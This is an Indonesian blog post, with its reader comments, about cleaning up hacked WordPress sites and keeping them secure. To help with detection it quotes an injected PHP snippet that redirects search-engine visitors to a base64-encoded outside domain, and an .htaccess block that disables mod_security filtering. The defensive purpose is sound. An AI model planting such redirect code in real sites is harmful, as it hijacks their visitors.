Anda memiliki blog bermesin WordPress? Pernah mendengar bahwa ada yang bisa meng-hack blog berbasis WordPress? Atau Anda pernah melihat secara langung situs favorit Anda –yang masih berbasis WordPress- di-hack? Anda pernah menjadi korban si Hacker?
Ok, sebelum terjadi kesalah-pahaman, Saya hanya ingin mengklarifikasi, sebenarnya istilah Hack (predikat) atau Hacker (subjek) kurang cocok; karena Hack memiliki artian luas, meskipun masyarakat awam mengganggap bahwa Hack atau Hacker selalu ke arah konotasi negatif. Bahkan, Bill Gates -sang pendiri Microsof- pun bisa disebut Hacker.
Dalam artikel ini, Hack/Hacker memiliki arti negatif dan tidak baik. Sepakat? Loh? Koq jadi membahas masalah Hack/Hacker? Baiklah, sekarang kita ke pendahuluan
Masih ingat saat banyak media memberitakan bahwa blog si A atau si B kena hack? Masih ingat tulisan “Please Update Now” di bagian Dashboard WordPress Anda jika terdapat versi baru? Anda sudah mengupgrade versi WordPress Anda? Belum? Hanya masalah waktu sampai blog Anda juga di hack
Malangnya, untuk sebagian blogger yang telah mengupgrade, mereka terkadang terlambat mengantisipasi. Sang hacker malah lebih dulu mengetahui seluk-beluk blog kita (perhatian! Ini bukan BloG kiTa yang ini
) dan (mungkin) telah meletakkan BackDoor (apa itu? Monggo dicari di om google
).
Apa yang harus Anda lakukan jika Blog WordPress Anda kena Hack?
- Segera upgrade WordPress Anda ke versi yang paling baru.
- Yakinkan tidak ada BackDoor atau Malicious Code di sistem Anda. Terkadang sang Hacker meletakkan script baru atau bisa juga merubah file standar WordPress. Cek juga file theme yang Anda gunakan.
- Ganti Password lama Anda setelah upgrade selesai. Yakinkan bahwa Hacker tidak membuat admin/user lain di WordPress Anda.
- Edit file wp-config.php dan ubah atau buatlah sebuah SECRET_KEY. SECRET_KEY biasanya memiliki format:
define(‘SECRET_KEY’, ‘07081987’)
silakan dirubah angka-angka di atas dengan kreasi Anda sendiri
Kode Tersembunyi oleh Hacker
Biasanya, para Hacker menggunakan beberapa cara untuk merusak blog WordPress Anda, diantaranya dengan:
- Menyembunyikan kode jahat di script php Anda. Jika direktori blog dan file Anda berstatus Writeable oleh WebServer, sang hacker bisa leluasa menanam kode-kode yang menguntungkan mereka. Contoh yang paling sering menjadi sasaran empuk adalah wp-blog-header.php. File theme yang digunakan juga beresiko. Saat Anda meng-upgrade WordPress Anda, file theme Anda tidak ikut berubah, jadi silakan cek sekali lagi. Apalagi jika Anda menemukan file ter-decode, seperti:
< ?php $seref=array("google","msn","live","altavista","ask","yahoo","aol","cnn","weather","alexa");
$ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser=”1″; break; }if($ser==”1″ && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit; }?>< ?php DST (kalau ditulis lengkap, ntar disalah gunakan)
Untuk melihat berbagai macam bentuk script yang mungkin berbahaya, bisa melihat di sini.
- Merubah file .htaccess. Cek file .htaccess yang berada di bagian root direktori blog Anda. Jika Anda tidak pernah mengubahnya, maka seharusnya Anda akan melihat kode-kode berikut:
# BEGIN WordPress
<ifmodule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</ifmodule>
# END WordPress
Mungkin juga Anda akan mendapati tambahan kode (biasanya akibat program uploader yang Anda gunakan), seperti:
<ifmodule mod_security.c>
<files async-upload.php>
SecFilterEngine Off
SecFilterScanPOST Off
</files>
</ifmodule>
- Memasukkan kode PHP namun disamarkan dengan file berformat jpeg ke direktori upload Anda dan menambahkan beberapa file yang bertugas untuk mengaktifkan beberapa plugin yang mereka kehendaki. Hal ini sulit dideteksi ataupun ditemukan. Namun, bukan hal yang mustahil. Silakan coba cara ini:
- Buka PHPMyAdmin dan masuklah ke options table. Cari data active_plugins
- Edit data tersebut. Anda akan menemukan tulisan-tulisan “aneh” dan panjaaaaaaaaaaaaaaaang sekali. Carilah teks seperti “../uploads/2009/08/07/xzvrtgfhjks.jpg” (perhatikan nama file *.jpg nya. Ingat-ingat apa Anda pernah mengupload file jpg dengan nama aneh begitu?
). Hapus teks tersebut dan pastikan Anda juga membasmi serialized array information. Hapus juga active_plugins record dan aktifkan semua plugin Anda sekali lagi
- Periksa direktori upload untuk file jpg tersebut. Hapuslah.
- Jika binggung, silakan lihat video ini. Hanya saja, dalam video tersebut ada proses penghapusan rss_* database record. Saya rasa ini tidak terlalu penting (bagi Saya yang awam). Atau ada yang ingin menjelaskan mengapa rss_* juga harus dihapus?
Ubah Password WordPress Anda
Setiap Anda mengupgrade dan yakin bahwa proses installasi berjalan lancar dan tidak terdapat jejak penyusup, pastikan Anda:
1. Merubah SELURUH password user yang ada dalam sistem WordPress Anda
2. Yakinkan bahwa sang Hacker tidak memiliki akun yang dapat digunakan untuk login suatu saat nanti.
Install Plugin Pendeteksi Hack
Sebagai langkah pengamanan, ada baiknya Anda menginstall WordPress Exploit Scanner yang akan membantu Anda dalam menemukan file/script yang berbahaya yang Ada dalam blog WordPress Anda.
Semoga tulisan sederhana ini akan mengurangi angka pengrusakan situs, khususnya blog bermesin WordPress. Jika ada kesalahan dalam pemaparan, tolong bantu Saya memperbaikinya
Blogger yang Baik adalah Blogger yang Merawat dan Menjaga Blog-nya.
*sekedar informasi, WordPress yang paling sering kena hack adalah versi 2.6 ke bawah. So, segera upgrade ya! 2.8.6 lho yang sekarang
Kata Kunci yang digunakan untuk sampai ke tulisan ini:

67 Orang telah berKomentar untuk tulisan “Cegah Hacker Mengincar WordPress Anda!”
Anda bisa memantau perkembangan komentar di sini melalui atom feed.





![ahyari [dot] com on del.icio.us](http://www.blogcatalog.com/images/services/6.gif)
![ahyari [dot] com on Digg](http://www.blogcatalog.com/images/services/5.gif)
![ahyari [dot] com on Facebook](http://www.blogcatalog.com/images/services/13.gif)
![ahyari [dot] com on Flickr](http://www.blogcatalog.com/images/services/4.gif)
![ahyari [dot] com on MyBlogLog](http://www.blogcatalog.com/images/services/3.gif)
![ahyari [dot] com on Reddit](http://www.blogcatalog.com/images/services/30.gif)
![ahyari [dot] com on StumbleUpon](http://www.blogcatalog.com/images/services/7.gif)
![ahyari [dot] com on Technorati](http://www.blogcatalog.com/images/services/8.gif)
![ahyari [dot] com on Twitter](http://www.blogcatalog.com/images/services/10.gif)
![ahyari [dot] com on identi.ca](http://i289.photobucket.com/albums/ll201/71mm0/identica.png)


PertaMaaaxxx…..
nyimak dulu..,mantep dah…..kaga paham (belum) bhasa PHP…:-B
jadi kalo dah diupgrade ke versi terbaru, apakah yakin aman ??

iyoong´s last blog ..Give Them The Spirit alive
Posted on December 4, 2009 at 12:41 am.
Masih belum terlalu paham nih bahasa pemrograman PHP tapi bagus juga nih buat nambah ilmu… 8->
reza´s last blog ..Visi dan Misi
Posted on December 4, 2009 at 8:22 am.
Belum gerti tapi gak apalah nambah ilmu juga n makasih info.
Posted on December 4, 2009 at 5:52 pm.
Panjang amat… ctrl+d aja dulu.. trims info nya bro..
Posted on December 5, 2009 at 9:12 am.
info nya membantu … save as j dlu biar diprint …
Rizal´s last blog ..Indonesia
Posted on December 5, 2009 at 10:11 am.
wah infonya berguna banget…THANKS!!!!
Posted on December 5, 2009 at 10:03 pm.
Wuah mantab mas. trims infonya.
Salam
Posted on December 6, 2009 at 11:37 pm.
bah iyaam.. kada ngerti am WP hohoho 8->
manusiahero´s last blog ..Renungan Cinta
Posted on December 8, 2009 at 1:07 pm.
Wah thank’s infonya…
aku punya tambahan 1 point, selalu backup database website.
kadang kalo sudah kecolongan, dan data2 kita dirusak satu langkah kecil ini yang bisa menyelamatkan artikel2 kita.
Irawan´s last blog ..Secangkir Kopi Pahit
Posted on December 12, 2009 at 7:48 pm.
ngeri juga kalo wordpress bisa di hack.. secara blog ane semua pake wordpress.. terima kasih infonya manteb.. langsung praktek..
ups sekalian numpang promosi
iklan baris gratis
Posted on December 15, 2009 at 1:21 am.
Mau tanya nih sob, kalau upgrade WP, settingan theme dan pluginnya masih tetap seperti semula ga?
Bisnis Online´s last blog ..Dengan Sepuluh Dollar Dapat Seratus Domain Gratis
Posted on December 15, 2009 at 11:43 am.
nice info gan…
Car Review´s last blog ..2010 Ford Mustang GT
Posted on December 18, 2009 at 2:58 am.
blognya keren…..
Posted on December 18, 2009 at 3:00 am.
waduh untungnya, gak pake word press nih, pake blogger terus
Posted on December 21, 2009 at 4:08 pm.
mantep nih artikelnya, mesti bookmark dulu kayaknya, ntar malam baru praktekin
Lowongan kerja bank´s last blog ..Links for 2009-12-19 [Digg]
Posted on December 21, 2009 at 4:12 pm.
artikel yang sangat bermanfaat bagi para pemakai wp, thanks kawan, blon bisa dihafal nih… jd saya bookmark dulu…

intermezo´s last blog ..Kontes SEO Astaga.com
Posted on December 22, 2009 at 12:30 pm.
hacker-hacker tak bertanggung jawab
Kompetisi Website Kompas MuDA–KFC´s last blog ..Rujak Kuah Pindang
Posted on December 24, 2009 at 6:39 am.
wew. . .keren kang tipsnya. mesti bnyk belajar disini nih kyknya

Ngobrol Seputar Bisnis Online´s last blog ..Daftar Pemenang Kontes Mengembalikan Jati Diri Bangsa
Posted on December 24, 2009 at 6:07 pm.
belum pernah dengar wordpress bisa di hack? klau pun bisa itu mungkin karena keteledoran kita saja dalam menyimpan password dll
liudin´s last blog ..4 Alasan Utama Untuk Mulai Menulis
Posted on December 27, 2009 at 5:18 am.
tapi kalo blog seperti blog saya ngga bakal dah ada hacker tertarik buat ngejahilin..biasanya blog2 gede tuh..hehehehe..salam kenal mas

topanz´s last blog ..Selamat Jalan Gus Dur
Posted on December 31, 2009 at 5:29 pm.
Makasih banyak infonya. Tapi blog saya rusak justru karena saya sendiri salah mengubah tempalte. Gimana ya memperbaikinya? Login pun saya tidak bisa di zianxfly.web.id
Zian X-Fly´s last blog ..Dunia Baru
Posted on December 31, 2009 at 10:41 pm.
kau pernah kena hack tuh….untung gak parah banget….
yanti tukang kerupuk´s last blog ..Energi kita adalah kerja keras
Posted on January 2, 2010 at 8:20 pm.
maksudnya blog aku pernah kena hack mas….typo! Maaf,salam.
Posted on January 2, 2010 at 8:21 pm.
nice post

fiki´s last blog ..Grosir Jaket Batik
Posted on January 8, 2010 at 8:40 am.
waduh mesti ekstra hati hati nih, biar gak kena hack. salah satu cara yg cukup bagus adalah sering ganti password kali yah?
CDMA Blackberry´s last blog ..Multi Touch In Google Nexus One
Posted on January 10, 2010 at 6:35 pm.
wah-wah halaman ini mah harus di bookmarked dulu sob, makasih inphonya yah

tips computer´s last blog ..Partisi harddisk
Posted on January 18, 2010 at 5:06 pm.
Luarbiasa bos tipsnya! Matur Tank’s
Regard’s
Posted on January 19, 2010 at 10:46 am.
makasih infonya bro.. apa sama dengan Blogger juga ya?
Laston´s last blog ..“Kerikil” di dalam panitia Angket Century
Posted on January 19, 2010 at 1:46 pm.
makasih banget infonya
memang walaupun hanya sebuah blog tetap berharga bagi saya..
Posted on January 25, 2010 at 3:33 pm.
salam kenal mas.
ane orang ngalam..
kunjugan balik yah..
madhe´s last blog ..Liburan yang mengenaskan..
Posted on January 26, 2010 at 3:28 pm.
ah pusing mas…

gak begitu paham sih masalah begituan..
Human Biology´s last blog ..Guide to Have Healthy and Beautiful Body
Posted on January 27, 2010 at 4:56 pm.
thankss dah sharing. .
haduh,aku belum upgrade lagi mass. .
harus segera niehh
DianRibut´s last blog ..Kompetisi Website Kompas MuDA – KFC
Posted on February 4, 2010 at 1:40 pm.
wah….ane pake wordpress gan….
bahaya nih….
Posted on February 8, 2010 at 3:42 pm.
agggrrrrhhhhh!!!!!!

I hope Force be with my blog
Posted on February 9, 2010 at 11:47 pm.
fiuhh, ternyata sang hacker juga mengincar wordpress rupanya…

wah, harus waspada nih.
irmanf´s last blog ..Tips Jitu Merawat Cartridge Printer Agar Awet
Posted on February 12, 2010 at 12:55 am.
wwwiihhh…jadi ngeri jg nih,
Posted on February 16, 2010 at 1:51 pm.
wah,makasih infonya…
sms cinta lucu´s last blog ..SMS Romantis – Kesungguhan Cinta
Posted on February 25, 2010 at 12:13 am.
wah makasih banget nih informasinya….

sangat membantu saya…
thanks..
Alam´s last blog ..Spesifikasi Kamera Digital Pentax K-7
Posted on March 6, 2010 at 12:31 am.
informasi yang berguna
terima kasih banyak
Lirik Lagu Terbaru´s last blog ..Audy – Selalu Terdepan
Posted on March 8, 2010 at 6:40 pm.
sekarang banyak sekali blog2 yang kena hack…salah satunya temen saya
aku coba tutorialnya…mudah2an bermanfaat ini

Nowgoogle.com Adalah Multiple Search Engine Popular´s last blog ..By: Khairuddin syach
Posted on March 13, 2010 at 10:11 am.
Makasih informasinya mas, sangat membantu nich soalnya saya termasuk pendatang baru di Dunia Wordpress
Putra Blambangan´s last blog ..Seo Google Oleh Team Ajib
Posted on March 14, 2010 at 3:22 am.
makasih.. makasihh..
ijin save page om..hehe
Posted on March 16, 2010 at 11:50 pm.
beberapa minggu yang lalu, blog saya juga kena hack
sayangnya saya belum baca tutorial ini
:(
nayantaka´s last blog ..Penyebab Adsense di banned | Autocontent | Autoblog
Posted on March 19, 2010 at 2:14 am.
selamat siang mas,..
saya tertarik dengan content blog ini, RSS feed ahyari[dot]com, saya pasang di widget. Supaya kalau ada berita baru, saya bisa segera tahu
nayantaka´s last blog ..Penyebab Adsense di banned | Autocontent | Autoblog
Posted on March 19, 2010 at 4:31 pm.
Wah takut juga ini setelah baca artikelnya, cuma jujur aja masih belum paham ma yang di jelas disini.X_X perlu mempelajari lebih dalam ni sepertinya.
Posted on March 21, 2010 at 8:17 pm.
simak dulu gan, di pelajari dulu. ga mudeng bahasanya tingkat tinggi,
kado ulang tahun´s last blog ..jasa pembuatan karikatur berkualitas
Posted on March 24, 2010 at 6:44 pm.
tipnya mantep gan… makasih atas tips ama sarannya…
oh ya mau nggak gan tukeran link
fansbook´s last blog ..The role of SEO for Internet business
Posted on March 25, 2010 at 2:00 am.
wah strategi yang jitu buat wordpressnya
Posted on March 25, 2010 at 4:39 pm.
Terima kasih untuk infonya..

Realodix´s last blog ..EARTH HOUR: Sebuah Event Pemilu Global
Posted on March 27, 2010 at 11:49 pm.
Tutorial hebat. Salam kenal.
Posted on March 30, 2010 at 8:00 pm.
Apakah wordpress yang bisa diserang cuman wp yang berbayar ya?
Posted on March 31, 2010 at 2:35 pm.
dulu sih sempet pake mesin wordpress yg gratisan..
tapi sekarang udah beralih ke blogspot…soalnya wordpress gratisan gak fleksibel…
Posted on April 1, 2010 at 1:28 am.
MEMANG HARUS WASPADA …. DAN TERUS MENINGKATKAN KEAMANAN BLOG WORDPRESS … TERUTAMA DARI SISI PENGGUNA/PEMILIK …. SUDAH BANYAK TEMAN2 SAYA KENA HACK PADAHAL SAYA JUGA PERNAH NULIS TTG PENTINGNYA MENJAGA KEAMANAN WORDPRESS TAPI ADA BEBERAPA BANYAK JUGA SAYA CEK MASIH2 SANGAT2 RENTAN UNTUK DISERANG ….
Alwi´s last blog ..Cari Aplikasi Gratis Lewat ZeuApp
Posted on April 8, 2010 at 8:18 pm.
Lha kalau dihack, username dan password tidak bisa dijalankan. Cara mengatasinya bagaimana? Mohon info
Posted on April 13, 2010 at 4:00 am.
waduhh untung belum nggunain si wordpress.
Trik Blogger´s last blog ..Google Saingi Facebook dan Twitter
Posted on April 18, 2010 at 11:54 am.
Modifikasi Dashboard WordPress | ahyari [dot] com says:
[...] karena ini penting. WordPress terbaru biasanya tingkat keamanannya lebih tinggi. Juga agar Mencegah WordPress Anda diincar Hacker. Tapi kalau cuma ingin coba-coba, [...]
Posted on May 15, 2010 at 11:34 pm.
Selamat datang Di Planet Agregator Blog farmasi says:
[...] karena ini penting. WordPress terbaru biasanya tingkat keamanannya lebih tinggi. Juga agar Mencegah WordPress Anda diincar Hacker. Tapi kalau cuma ingin coba-coba, [...]
Posted on May 16, 2010 at 1:51 am.
cocok boz buta yang baru belajar WP.org…hehehe
bowo´s last blog ..Komputer Mampu ‘Ramalkan’ Kemacetan
Posted on June 18, 2010 at 11:50 am.
Bos makasih neh pluginnya…. ribet jg yah kalo blog kita dah bgs… kalo belum mah sapa yg mau ngehack…hehe
Lyrics´s last blog ..Five For Fighting Nyc Weather Report Lyrics
Posted on July 9, 2010 at 5:42 am.
sikret kii nya yg di wp-connfig tuu fungsinya buat apa yaak om ?
Posted on July 25, 2010 at 2:16 pm.
Makasih infonya gan, periksa dulu ah sapa tau ada yang aneh
soalnya banyak bot masuk ni
Iseng Ngeblog´s last blog ..Choosing Laptop Backpack
Posted on July 25, 2010 at 7:16 pm.
mantap nih…bener kalau Wp harus sring di upgrate…saya dah kena..dan sekarang dah apgrate tapi masih ada sisa hack..ada link yang masuk di theme tanpa sepengetahuan saya…dah saya bongkar dieditor enggak ada kelihatan dimana dia sembunyi linknya …mohon bantuan nih…gimana cara mengetahui link yang masuk ke theme kita…sementara kita tidak pernah merasa buat link itu..
syahrizal´s last blog ..Seribuan Umat Lintas-Agama Datangi Istana Siang Nanti
Posted on August 15, 2010 at 11:24 pm.
Kalau boleh tahu, linknya ada dibagian mana? footer? bisa jadi linknya di decode..
Jimmy Ahyari´s last blog ..Kartu Kreditku Naik Pangkat
Posted on August 15, 2010 at 11:59 pm.
iya di bagian fhoter saya lihat di page soarce dia buat table html dan memasukkan linknya mmm boleh tau YMnya pak malam ini saya online
syahrizal´s last blog ..Seribuan Umat Lintas-Agama Datangi Istana Siang Nanti
Posted on August 16, 2010 at 12:06 am.
wah.. maaf pak, sekarang hanya via hape.. namun, Saya bisa menyarankan Anda untuk membaca di http://codex.wordpress.org/FAQ_Layout_and_Design#How_to_get_rid_of_encoding_in_a_theme.27s_footer.3F .
Buka file footer.php Anda, dan temukan kode-kode “aneh” seperti:
Biasanya diawali dengan base64_decode..
Semoga bisa membantu..
Posted on August 16, 2010 at 12:20 am.
trimakasih banyak atas bantuannya akan saya coba..salam persahabatan dan salam ukhuwah moga jadi ladang amal amiin
syahrizal´s last blog ..Seribuan Umat Lintas-Agama Datangi Istana Siang Nanti
Posted on August 16, 2010 at 12:32 am.
waduh mas.. baru saja web saya kena deface..
kang paidjo´s last blog ..Repair Grub Ubuntu Setelah Install Windows
Posted on August 29, 2010 at 10:46 pm.